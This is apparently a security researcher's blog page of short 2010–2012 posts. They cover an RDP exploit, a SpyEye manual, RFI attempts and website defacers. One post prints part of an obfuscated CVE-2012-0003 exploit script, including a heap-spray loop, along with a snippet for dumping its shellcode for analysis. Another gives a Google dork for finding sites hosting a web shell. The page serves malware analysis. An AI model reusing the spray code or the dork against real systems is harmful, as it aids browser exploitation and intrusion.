RDP exploit related ……. MS12-020

Posted in Uncategorized on March 16, 2012 by ianstarkc

1-day vulnerability analysis using DarunGrim

ocean’s InsecLab

Pastie

Rar File 

SPYEYE Manual ….F-Secure … and ….”VISCOLUL” at 10:31 !!

Posted in Uncategorized on March 13, 2012 by ianstarkc

Recently F-Secure posted about Spyeye manual . It seems back in 2011, some one helped other guy to configure Spyeye and linked to this manual. IRC logs are here. …………………………………………………………………………………………………………… b3cfzzw5l

Shellcode of Exploit CVE-2012-0003 (MIDI file ….) from Dadong JSXX 0.41 VIP obfuscated script…

Posted in Uncategorized on January 31, 2012 by ianstarkc

Insert following code  at “INSERT” location in original malicious script . remove MIDI exploitation code before execution :)

 

var fpo = new ActiveXObject(“Scripting.FileSystemObject”);
var sc = fpo.OpenTextFile(“c:\\Shellcode.bin”,true);
sc.WriteLine(escape(kpemoez4));
sc.Close();

 

————————————————————————————
———————————————————————————–

try{alert(a,b,c);}
catch(e)
{
var HrMm7=”d”;
while(FJWVzIe1.length < aqfvjY5/2) FJWVzIe1 +=FJWVzIe1;
var DmxL8 = FJWVzIe1.substring(0, aqfvjY5/2);
HrMm7=”d”;
delete FJWVzIe1;

“INSERT”

for(i=0;i<270;i++)
{
NyWLa1[i] = DmxL8+DmxL8+kpemoez4;
}

}

——————————————————————————————-
——————————————————————————————

LOD 0×05

Posted in LOD on February 15, 2010 by ianstarkc

This website , will give you all information about hacked/defaced site . Recently it exposed   e2 Lab scam (Earlier associated with Ankit Fadia .. LOL and   Double LOL   :)

LOD 0×04

Posted in LOD on February 14, 2010 by ianstarkc

If you’ll analyze web-logs of National Software Reference Library supported by National Institute of Standards and Technology (NIST), US  especially at “Technical Information–>Missing Files , there you’ll see lots of RFI (Remote File Inclusion ) exploit attempts. All these files are having the strings which is explained by SANS Storm Center. You know  how websites gets hacked ?   Here is a  sample hacked site . More hacked sites you can find using this Google dork  “intitle:FaTaLisTiCz_Fx Fx29SheLL“. Also you can analyse  these web-logs and most important your web-logs !! So what you think about FeeLCoMz ?

LOD 0×03

Posted in LOD on February 6, 2010 by ianstarkc

Websites defaced by R3YR3 !!

http://www.paidantivirus.com         

http://www.viruseliminate.com       

Both websites are owned by same person ( has taken WHOIS privacy service).

R3YR3 is a member of Indonesian Defacers group .  It seems another member , Flyff666 from same group is resposible for Win32.Sality.aa virus as detected by Kaspersky and he  himself  has given different names like W32.Sarap.B or W32.Amburadul.Virus or has taken code from them. Infected files are here and I think this webserver itself is infected. ( Files are in double extensions , this virus is infecting Image file format like JPG,  gif, png etc.)

LOD 0×02

Posted in LOD on February 4, 2010 by ianstarkc

 Bootloader Development Environment

 Creating a bootloader from scratch

Follow

Get every new post delivered to your Inbox.